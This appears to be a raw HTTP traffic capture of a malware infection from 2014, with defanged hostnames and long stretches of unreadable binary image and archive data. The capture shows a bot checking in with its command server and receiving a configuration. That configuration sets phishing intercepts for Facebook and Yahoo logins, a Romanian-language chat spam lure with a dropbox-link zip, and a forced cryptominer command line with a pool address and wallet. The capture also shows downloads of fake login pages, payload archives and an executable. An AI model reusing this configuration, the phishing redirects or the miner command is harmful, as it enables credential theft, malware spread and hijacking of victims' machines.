......Exif..II*.................Ducky.......P.....&Adobe.d...............3...P~...D...s............................................................................................................................................%............................................................................................... 0!.2.P`1"..35#4%$@.A.......................!1...Q2..5 0Aaq."34.`.....BRr...#s.Pb.t..CS.$D.@.c....Td....................1.!.0`. @A.2P.Qaq."...Bpr#....................!1Aq..Qa 0........P@`p..........................1.0..(..............V..`...id...%..V.&%@...@.E....E................. .J...A......B. a. .A .$...%sK$.. f.\F..Pd\..cLV..e .....x.V...-......%a............H.......P.....l.Iy@...yo. ..g..F.X....*5......J5....K.Q..X.1.d! X..^Y...... ......P............T.....e.J...^Q%,..ifUa..2K.Y5.....IF.X.61..Ml..>9\..4.&i......Id.EQ..@...................H....X....&I@.d.L.!D...~..{|&._9...>0....\..L..o...f....r...`.....a...P ....I.......@......e.."...L.H.............(..X.2.....{>......3..}.>..?.....X....X4..Z].s&.X....Ye.S,".\ni..f...e.(.b.,.L...A.....2J......P....(...V@.%@...$.../.Yd..l./f......4......u..>$./...*Y..z..'W=.<....<.w.......U4..v.~.W..k...>7..P..X..;5...Fi..TLv@...H..J................I.....$.0..$.I.[(.b.....w.N.....y.w1...:7}1.......Y..%.8.=.....V.....;...<w........}%..G.^...i.....o....Z\vj...%.(..X..^[..U*...... .....L.,...H..A.....&P".v.2K.Y*a..l.......%.y>..z..1}...e..2.4n.g.._c./O....H............F....._.}?7.|._[<z._&.9p{....m\.....<.Q0e `..$.A.l.E..%

<<< skipped >>>

GET /_images/home/home_signup_button.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 4264

Last-Modified: Mon, 10 Sep 2012 22:54:03 GMT

Connection: keep-alive

ETag: "504e6f8b-10a8"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR....... ........?....tEXtSoftware.Adobe ImageReadyq.e<...JIDATx..].tT......d..d2y.I&...$.W.AQ..U.z..]..]...........]W.Vm.....l-.l..Q.......H..G.H L..I.=w.sr..3s&.n.....vf.~..........T[".P.......u$U.....W.....9..}.>h..'.;.. ..n..ld;R.R..6)...n.T.<.ZuhmM........l...<.3..ME..>.....X....$..FX........un..EX7.|.ZO...(...........9.?...*Gy...a.Z(P......V............0..}.w.T9..)..@A4.^0..R........ ..@A4..r(.C..i..P,...1..h..0q..f(P r..^\....U.i....z..j(....k.M..eCF.6..h.....a>c.y......n.:...D..LM.......A........a.~.W....?.i.m..^..........r..&:1.V.....3pm.9ay.-........|x~ a..........{<d....`X{.......`..g...2#.#.....'.O:w...An...[u.Q.X...E...t."/.*R".P._..K...y.......*.......o...em{\~0........I...M_.[%.D.w....g.p../#baw(...s.v...U...;.2G2j....X.(.}....fO>....A..4...zr.EQ.0cI.0v..X....f2...M....[%.N<5C.....'(...h.B@..n../....q#........|...........w.L.._.5.2.U.S.>.....w{q._o.I...|..7..(.$1yu...c%4.... "..WA....C=.....Z.....N.........=H....f.k..'....H....\,.LA......T...'....5I.n...-.sv..">.{..UnC.[u..9.Z4.;...1....m......._.@p...Ys..-Qm.M...2;...5..F........NtI...u.......*...Z.e.ol!TE..?...Vo........X:.......Fp.=.._...O9b..q.8n.*E.....G.OI...U4.T9.....t...G..@..W..z..%.|...al..q..#...Ez.I...#....;.....:.u..xy.b.......jj9B#.W..........<8;..........23....St.h....|....L.P.......b\..>....}....3.X.........e..#.4...B.zlW....I............U....q......r.5.....(".<. g9..a@.V....)..{'.|YC..'....Uf.^.Y&@.....D.X.eb..............*q...K...I..c}M....Ax....?l.m.#(.....A-.zm..-..Q....

<<< skipped >>>

GET /forum/search.php?method=checkport&port=48744&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 502 Cannot find server.

Date: Fri, 30 May 2014 15:55:57 GMT

Server: YTS/1.20.28

Cache-Control: no-store

Content-Type: text/html

Content-Language: en

Content-Length: 2477

<HEAD><TITLE>Cannot find server.</TITLE></HEAD>.<BODY BGCOLOR="white" FGCOLOR="black">.<FONT FACE="Helvetica,Arial"><B>. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html><head><style>a:link {font:8pt/11pt verdana; color:red}a:visited {font:8pt/11pt verdana; color:#4e4e4e}</style><meta HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"><title>Cannot find server</title></head><body bgcolor="white"><table width="400" cellpadding="3" cellspacing="5"><tr><td id="tableProps2" align="left" valign="middle" width="360"><h1 id="textSection1"style="COLOR: black; FONT: 13pt/15pt verdana"><span id="errorText">The page cannot be displayed</span></h1></td></tr><tr><td id="tablePropsWidth" width="400" colspan="2"><font style="COLOR: black; FONT: 8pt/11pt verdana">The page you are looking for is currently unavailable. The Web site might be experiencing technical difficulties, or you may need to adjust your browser settings.</font></td></tr><tr><td id="tablePropsWidth" width="400" colspan="2"><font id="LID1"style="COLOR: black; FONT: 8pt/11pt verdana"><hr color="#C0C0C0" noshade><p id="LID2">Please try the following:</p><ul><li id="instructionsText1">Click the Refresh button, or try again later.</li><li id="instructionsText2"> If you typed the page addr

<<< skipped >>>

GET /ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://VVV.fileswap.com/&random=2372120351 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: NID=67=t8o-Zui-3gnP-ve0tH7WYex-hn4pMhm1EpKCxI3m5PBHcFBoMJo8aCL-teIkHsnvONZxZ0L-zJqhyD35HUtVVcDze46xFBGVMiMbFC0VCvHVInY6KocRSe79gKG2PLsO

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.google.com

HTTP/1.1 302 Found

Location: hXXp://VVV.google.ca/ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://VVV.fileswap.com/&random=2372120351&ipr=y

Cache-Control: private, max-age=43200

Date: Fri, 30 May 2014 15:56:12 GMT

Expires: Fri, 30 May 2014 15:56:12 GMT

Content-Type: text/html; charset=UTF-8

X-Content-Type-Options: nosniff

Server: adclick_server

Content-Length: 424

X-XSS-Protection: 1; mode=block

Alternate-Protocol: 80:quic

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.google.ca/ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://VVV.fileswap.com/&random=2372120351&ipr=y">here</A>...</BODY></HTML>....

GET /forum/search.php?method=all&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:56:09 GMT

Content-Type: text/html

Age: 0

Server: YTS/1.20.28

ping.5.FLAG cfg.215."westweight.net" "watchstand.net" "spendstudy.net" "southblood.net" "deadtomorrow.net" "signarmy.net" "saltsecond.net" "wifeknew.net" "ringfirst.net" "rockknew.net" "hangclock.net" "pointdeal.net" "lasopeidres.com" var_user_ip.560.%invite_cc% = "1";.Âºn_contact% = "1";.%live_link% = "hXXp://helpdesk.corp.ebay.com/chat.php?id=4094&sess=2eb56a4ecf4b19a9afea607c2a27c8ec&talk=1";.Ã«aylive% = "middleevery.net";.%set_intercepts% = ""VVV.facebook.com" "middleevery.net" "/fb_login/" "/login/" "1" "facebook.com" "middleevery.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "middleevery.net" "/yahoo/" "/config/" "0" ";.Ãžp_host% = "middleevery.net";.Ãžp_path% = "/dep/";.%no_password% = "0";.%timer% = "1200";.%state% = "BU";.%cpuinfo% = "Intel(R) Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)";..............

GET /fb_login/index_files/YpD-WuoLxM8.js?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:16 GMT

Accept-Ranges: bytes

Content-Length: 61686

Content-Type: application/x-javascript

Age: 0

Connection: close

Server: YTS/1.20.28

/*1364677351,173213727*/..if (self.CavalryLogger) { CavalryLogger.start_js(["6Ozhu"]); }.....self.__DEV__=self.__DEV__||0;....if(JSON.stringify(["\u2028\u2029"])==='["\u2028\u2029"]')JSON.stringify=function(a){var b=/\u2028/g,c=/\u2029/g;return function(d,e,f){var g=a.call(this,d,e,f);if(g){if(-1<g.indexOf('\u2028'))g=g.replace(b,'\\u2028');if(-1<g.indexOf('\u2029'))g=g.replace(c,'\\u2029');}return g;};}(JSON.stringify);........(function(a){if(a.require)return;var b=Object.prototype.toString,c={},d={},e={},f=0,g=1,h=2,i=Object.prototype.hasOwnProperty;function j(s){if(a.ErrorUtils&&!a.ErrorUtils.inGuard())return ErrorUtils.applyWithGuard(j,this,arguments);var t=c[s],u,v,w;if(!c[s]){w='Requiring unknown module "' s '"';throw new Error(w);}if(t.hasError)throw new Error('Requiring module "' s '" which threw an exception');if(t.waiting){w='Requiring module "' s '" with unresolved dependencies';throw new Error(w);}if(!t.exports){var x=t.exports={},y=t.factory;if(typeof y==='string'){var z='(' y ')';y=eval.apply(a,[z]);}if(b.call(y)==='[object Function]'){var aa=[],ba=t.dependencies,ca=ba.length,da;if(t.special&h)ca=Math.min(ca,y.length);try{for(v=0;v<ca;v ){u=ba[v];aa.push(u==='module'?t:(u==='exports'?x:j(u)));}da=y.apply(t.context||a,aa);}catch(ea){t.hasError=true;throw ea;}if(da)t.exports=da;}else t.exports=y;}if(t.refcount--===1)delete c[s];return t.exports;}function k(s,t,u,v,w,x){if(t===undefined){t=[];u=s;s=n();}else if(u===undefined){u=t;if(b.call(s)==='[object Array]'){t=s;s=n();}else t=[];}var y=

<<< skipped >>>

GET /fb_login/index_files/276449379149296_646761364.png?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://middleevery.net/fb_login/

Accept: */*

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Cache-Control: max-age=864000

Expires: Mon, 09 Jun 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 981

Content-Type: image/png

Age: 0

Connection: close

Server: YTS/1.20.28

.PNG........IHDR...7...1.....~.1[....IDATh.c...?.9 ,l5.w......;302..c.M............Y........NN%....LL...5............?....9.]i.g.>....(5....?7;.'f.&.&r.....&W/=..31}&.s...p".v.b.|..o/.t.z.nAMe..u.......JL..T......H.A....q,....Y...X...2...D.4t<'".....~..O.9%L..,O....t0. 3.o"..9e.......K.P....h.....M..0R.r.h...L.P.h...H!.Id.........b..\..tT.....i:....d...q6...%..Y~....?...z......>~...Xo.(..r.............._.=...Hx....@K......q...I.#.U.....).N.}...7b...j.J.....JQg...1.ys..A4x...../\..f..e)..c*........Nn"..v&.w.=t. .Cr.q......a.o...."./.a....So......s...#47..h...O.......p.....7'p...3...\|h....${.d9h>.... .C(..p.c..$..dW....4.`......"V.P...?${.ID.\|...4U'$.E.J!..L....L.L4.......LQ..w..AF..y..>.~........A6|.....>...Y...j..., $..N.....MR.W...-..o=.zQ.A\...`}r......#....=. ...|.5u]...3.. ............za1......U.... ..~..3.E........w`M....je.d.!&..g.=?....9tq.|...Yu =.s#.........=7.<.. ..L.TL.R.!...M.....@.$.sC.cDyn.z..9...........AR*..K...P.i..J...@.c..FP......F^E%....IEND.B`...

GET /dep/purple.zip HTTP/1.0

Accept: */*

Connection: close

Host: middleevery.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:47 GMT

Last-Modified: Tue, 20 May 2014 22:57:46 GMT

Accept-Ranges: bytes

Content-Length: 3668848

Content-Type: application/zip

Age: 2

Server: YTS/1.20.28

PK........Sw.D................sasl2/PK........W"CD.@..~...........sasl2/saslANONYMOUS.dll...|T..8..f7..6..... JT4...MX...&A.n..%B.V..R..^..........V[}....C.}j. V..`..* U...6..K5JL6.r...{.f.......y}....{...3g...93s.L..;,6..b.?M.X.Y..y.......i..myi....g]....U..1}C.w......w.u.......6.J.?......Q.....Y{]R......? ....[_4.......z...].|..k)..........b.<..?...z>..w.....%=..{w%.3i.z,...x..[.zMX.%..Q.....V.e...5.~...j.7|..X.-..}Z:.:.(8.J..z...?..Y-......2..MVK.v.f..Z.D...b.%...|C.ux...[....:i.....A'..j..'.bY}].....,..n4.>..7.G...].G.<:.~v@.Xx....t]........d..........D.....h..(.|..... .....`.|.<..7.....z..%..K....X;..t...4......Z.G.....GP..........!..WG..l..?.wekF.E.........mT.:..I9!...bUK)[..Vw...eS...`...79Td....[9h.....m..#D...5@......Q.2.?XQ..J|.e...j.N.ag....W...d_..Q....H.v.,V...2...1.c... }...dI.......-..."U.HV ...t."C...V,kK..@...U-H[.. ....:q..U1......^....Gy_.c...}].y.w.w.l.p....p....l.....gP....y.!.G.....U.*._...B;Y>DK..H......@.Q...g.QD|sV........ZhW. ..F.u.S.....6.A.>#..E}F.>.g..GI){.^|........2...:...H..(M.5M.....p.....@..[.z.>....A.......MU'.<....R:...jg?%.#@v.....s]..(.r..n.|X..C..}.....1.p...{xK*. ..yG.4...@...i......!.ai. ...q..`....#..T..Zn.h........*.Av...Oi1..HD..e...\..|..[......=;U....!...y..B....~v.J_.../`c....m..........#X6..B.2f.,..R1/..Z.1...H.V'.f4<.1..C.....B.gX.[.{C......8J..q..qb.?.P.w.RK.g.....q...i.{.#....y.]....5...{../..YKC....|Y2 *.B.P.@......\M....g....a..-.P...y..8.b.;.M.....@..JSY..u... P...... ..S..h..._./._..........$......a....../.c...v.o.....>..

<<< skipped >>>

GET /fb_login/index_files/276449379149296_1538611903.png?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://middleevery.net/fb_login/

Accept: */*

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Cache-Control: max-age=864000

Expires: Mon, 09 Jun 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 1490

Content-Type: image/png

Age: 0

Connection: close

Server: YTS/1.20.28

.PNG........IHDR...,...-.............IDATX...kLTG...k...\X.)Oy...P..P,.....}.....P......6.....I.c.MZ...h..`.VZ.....Q.-.....C...Zv.n.Ywnn..w..2...9s....s..0..f..[..[.\.E.r(....T..P6.{...;s.~..j.8.a... .........K..j......8i.....9.......Zj.d.. D...`NM..0:.&x...h...Y9........u.....w.8..0 .bti0XJBx...H5.........R..I%...S#.t.{W...P..l2.)j..x.O...s..8JUKG*.H.\u`..<....%..R...Q.X>.,V1.t.V.*0...nf.rok..dRW#W..U6|.^d-{h..r...g.0.n.6....Y.PES..~l.5......;.&>.r...9u.....5............1.-..-...E....,.[.PY.........TW......4....ud..Ni...%.....>1.%..D..0;.e..I..... w.{;.8=....f..........P.\rb......m.6....i0).Q..a..0.`.=.............ov}......OYqzFq.....{.L..1...e..A.. . ;~Z.....eb`^.d%....|.....c.....~>77.e.I.E....S.hti.@..0.,4..........).rk.7pq........ ......e(X&........<......I.%E.>.s..*J7..?.1.(@......Mm........_5.;......el.5......94HG.Vf..G....B..@z..UU.......;...f..../`..D..K\...a{.....7......9..A*.bB......M......jb........{.....Y .<..).e..).l.y............kY .x.G..U/6^....^./..'...h4I.~E...E.......^...\......;.v......J..L...\...{A_..BFd.......M.{.......M>=..b!.q..g&$o.K....[.....x...D.........vw...;R.......g.>&.)(...n.6.!......;..;...;.....B..\..`....t.6,.Us...}.......)UK~}..S8.J,...........&..nb...u.F.a.w%.$..P.Z......phx.N.aJ......h...D~7.&..../).b.6...WGw\E... ... ...e..4.,49.J......i..~I.VQk.....v`i.HK......*4X.........L.L.R..{.....r.c". ...b~f\.;.Om.|.>.. .Ug.).../.....$.A....'.........3a.6.=q.....).a.g.z..w\a.A..........I0.|...!..K...PQ.!.i..CNA.:....].2S.|.<....IEND.B`...

<<< skipped >>>

GET /ext/swfupload/handlers.js?v=ebg HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: application/javascript; charset=utf-8

Content-Length: 14901

Last-Modified: Thu, 29 Nov 2012 17:57:20 GMT

Connection: keep-alive

ETag: "50b7a200-3a35"

Expires: Sat, 31 May 2014 15:56:11 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

<<< skipped >>>

GET /_images/icon/ico_footer_twitter.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 1039

Last-Modified: Mon, 10 Sep 2012 22:15:10 GMT

Connection: keep-alive

ETag: "504e666e-40f"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR...0...0......`n.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...Kh.A....}..d...bQ. .Z.....j."V j.*....A...7/".x..(..E...">.R..Q...VQ.....&...8c....Mv.z.!.l&..........W..........@......T.%.._...b4).:.. .(.x..O.(@$.....X...k<...3...e.~.Af.A......N.....7.,.2.:.3eS..e......r......w...a.u].TW.bg...T.2.b...O7.U....~B).y..1`..v.......4..~...\?D...[Y.yH...i^x....<".{;..P..S.a4.b..F...P.s.....6..K...W..G...c..n..J.g). U.D......!..........T}.yI.2..0...([. .........v.a..............N/.......5. .9Y........v.Y."........;........O......}z./Z.....dY....M...a.k...d..%.u. (..I.%1Khc....'...;j|.qV..g...!J{5.q....|....e....B..k.iz..Fp>.....& ..I_..;.:...D...C.X.;v...)..t.c...Z. v.J..a..E.O#6h..4x..b.!...9V.....Ok.$.TQ.<..\"....Gs......;.X@9?JTh...<_..N...q( ..B^o?r...H........~....4._....."jj<..,.....n....f.S.u...oa:.......0QA...j.P.o~...^....?..h"Um..t.......V\.d..S.!.k.. ...b.%1..{.|G.y.L.U..q.#..'..$./:8......K....m.R.....tl..}.|...9..D...X..]...2..*?.9..k#....8<.._..#[7...&.....i..J....:..r.\ ....K.....T.1;.9....IEND.B`.....

GET /_images/header_upgrade.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 946

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-3b2"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes

.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...TIDATx...[H.a..=.v.0..1...m9"6..]t1.]L.b7.D..b.caE7!...1F........h0LX..2....n...H..sf....(l.....|...~.....>.Ae.b1.Y6...[. .p....^.........)t.?.(..'.....~.....C......E...._....?...v..O....(.x.]h;.-.a6.oa.<..Hz.q......%....! !...Ry.|~..W2.@........"......c...0Np....Q..DVVV...."=C.......TS......?!... *2..da.H...S.g.....l[KKK.....)..<*......*....@%N$.....("9 ..Dfff.........GGG.I...s.3.....iW....H$...e......o.......k....v../...j\((((K.....6%M..|..V.}1<<l@....N...T..d.C`<...h~~./T.'...)...^OO...F..`VWW.....###O...#...........5...000...T.......G...."..E.nll...v..."../......DV.U.V._)....h.......d....]@0UUU...C-...T.........p.D8..CH.R..b..R.........k4..z.....D.....!p.....\...$..g......T*.K,..J...\..=?..4..C..........{."...0N...h.e.544.`..8....._.....|...C.~iOp.Dtc3......g.Q..<..d...n[[..........\WWG....{.L....q.. ..;.....\.;..<....P....9...g.....~.0.k. ...X.....IEND.B`...

GET /dep/dropbox.zip HTTP/1.0

Accept: */*

Connection: close

Host: middleevery.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:38 GMT

Last-Modified: Tue, 20 May 2014 22:57:46 GMT

Accept-Ranges: bytes

Content-Length: 6978685

Content-Type: application/zip

Age: 0

Server: YTS/1.20.28

PK.........}}C..CR............clientutils.js.=kw..... 4|. !.Er...........8....i.a:i....6....5....lUI.......=w9qL..R.T/.J..........s.0G0.y..sc....E..N.d.?`.S....o.:4.6....q/..M6..ysg.&H.E..nv.Z..}..~.l2..j7N8]...?.....F...#.....i.*v.........Y..}......c-.P.......&.E`sf.c....../....xv.Y.............3Z..B..:.9B ...T..%....|\c..s...Z.......K.#.......9......H`.p...?..........X.....d....U.EV....j..AWcn......o...._.,...c#..T....1..]g..N..@ .....0....f....oN../F.#.56v.$...,.......h..Dp.E ......X.ACGs$n..E].M...E@...\.E.A....} .....!. .........q...DS....[#....$'x~.XKTpF..L.Wbj..F\.......J.,@4D....d......Xs.........V..:.v.......Y.5..R....O{.C.5....#...V.#...=.....~{0@P.>.._.u.P....].w...........yg.p.=.SA.......?:.....Yg..f..3..dv.p[....v...Z}vq.......1@.v.'}..}.....1...;x`......d..... .G.......Cv.;;nC..6..z{.......Z...;n..~mS..@.#4.).d.O.X..........x.z.a..k0..0j..3h.X.....4.~.:A.B..........OO.T...A;..q.u....>Y_M...g;.o\.d!.x.w.....9..G..5R8g D5.Ho..a..d...VT.*...ue.$.Iq..>."U.n....{.t[&K*..8Q..O.C.#..;..............T.A.....l.Y........)wQt...N....$v.>.(.<.,.....u.R.r.....U.......-.{.g#. zuk..mk.~.................=:n..z......n..?.......>..5..|r3u>.qg.?.G ..........4^...O...S:4.r.N...m....D...r..=?...^.g....^..W.....W...~..??.......l.......\.p..e...\.p..e.w...A.=......iX{.f...A.=h..m...>...6..f.`.....}.......>.:.X.P~.......:.X.P....@.....M.j@...i@...i@...i@...i@.W....^..j.-...........3Pl......6..U...\c....N..J..D.._.(..JN........ph.U.`.Q!.....o..k%......9.....\ythN.E.@[..?..%*T.g.8_.T."........1.u.

<<< skipped >>>

GET /forum/search.php?method=all&flag&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:37 GMT

Content-Type: text/html

Age: 2

Server: YTS/1.20.28

ping.5.FLAG cfg.215."saltsecond.net" "deadtomorrow.net" "ringfirst.net" "westweight.net" "watchstand.net" "signarmy.net" "pointdeal.net" "rockknew.net" "hangclock.net" "wifeknew.net" "spendstudy.net" "southblood.net" "lasopeidres.com" var_user_ip.763.%kill_jhminer% = "1";.%invite_cc% = "1";.Âºn_contact% = "1";.%live_link% = "hXXp://helpdesk.corp.ebay.com/chat.php?id=4094&sess=2eb56a4ecf4b19a9afea607c2a27c8ec&talk=1";.Ã«aylive% = "middleevery.net";.%set_intercepts% = ""VVV.facebook.com" "middleevery.net" "/fb_login/" "/login/" "1" "facebook.com" "middleevery.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "middleevery.net" "/yahoo/" "/config/" "0" ";.Ãžp_host% = "middleevery.net";.Ãžp_path% = "/dep/";.%no_password% = "0";.%timer% = "1200";.%state% = "BU";.%cpuinfo% = "Intel(R) Atom(TM) CPU D525 @ 1.80GHz (1800 MHz)";.%send_libpurple_spam% = "XMPP.sebastianconstantinbaciu@chat.facebook.com.seby123.Vreau sa postez pozele astea, crezi ca e ok? %dropbox_link%.zip.2.23364.20..";.%newport% = "48744";.plugin.54656.miner_forced.183.win32mrocli2.exe -a cryptonight -a cryptonight -o stratum tcp://minin.gs:17777 -u 1VJruexZzXuRos1tWixCqQ4P7NW8V7qGCYKuRbzXcJz2iixiSzbz837SR4hJBZPoQj1iJtbeKTrek2bXNttF6dgAN6Bjjbx -p x.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........lg...4...4...4.?y4...4...4...49..4...4...4...4...4...4...4...4...4...4Rich...4................PE..L......S.....................N......5.............@..............................

<<< skipped >>>

GET /fb_login/index_files/wNhnmk7Kpi3.js?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 248195

Content-Type: application/x-javascript

Age: 0

Connection: close

Server: YTS/1.20.28

/*1364176002,173213213*/..if (self.CavalryLogger) { CavalryLogger.start_js(["PIiAz"]); }..__d("EmuController",["AsyncRequest","DataStore","URI","$","copyProperties","emptyFunction","ge","goURI"],function(a,b,c,d,e,f){var g=b('AsyncRequest'),h=b('DataStore'),i=b('URI'),j=b('$'),k=b('copyProperties'),l=b('emptyFunction'),m=b('ge'),n=b('goURI');function o(p,q){this.impression=q;this.containerId=p;h.set(j(p),'emuController',this);return this;}k(o,{fromContainer:function(p){var q=m(p);if(!q)return null;return h.get(q,'emuController');},getEventClass:function(p){return "emuEvent" String(p).trim();}});k(o.prototype,{EVENT_HANDLER_PATH:'/ajax/emu/end.php',CLICK:1,FAN:"fad_fan",FOLLOW:"fad_follow",event:function(p,q,r,s){var t={eid:this.impression,f:0,ui:this.containerId,en:p,a:1};if(q)t.ed=JSON.stringify(q);if(!s)s=l;var u=new g().setURI(this.EVENT_HANDLER_PATH).setData(t).setErrorHandler(s);if(r)u.setHandler(r);u.send();},redirect:function(){var p={eid:this.impression,f:0,ui:this.containerId,en:this.CLICK,a:0,sig:Math.floor(Math.random()*65535) 65536},q=new i(this.EVENT_HANDLER_PATH);q.setQueryData(p);n(q);}});e.exports=o;});.__d("legacy:ad-units-base-js",["EmuController"],function(a,b,c,d){a.EmuController=b('EmuController');},3);.__d("BassWhitespaceListener",["Bootloader","Event","Parent","copyProperties","goURI"],function(a,b,c,d,e,f){var g=b('Bootloader'),h=b('Event'),i=b('Parent'),j=b('copyProperties'),k=b('goURI');function l(m,n){this.link=n;h.listen(m,'click',this.onclicked.bind(this));}j(l.prototype,{onclicked:

<<< skipped >>>

GET /dep/zip.exe HTTP/1.0

Accept: */*

Connection: close

Host: middleevery.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:56:07 GMT

Last-Modified: Tue, 20 May 2014 22:57:38 GMT

Accept-Ranges: bytes

Content-Length: 290816

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28

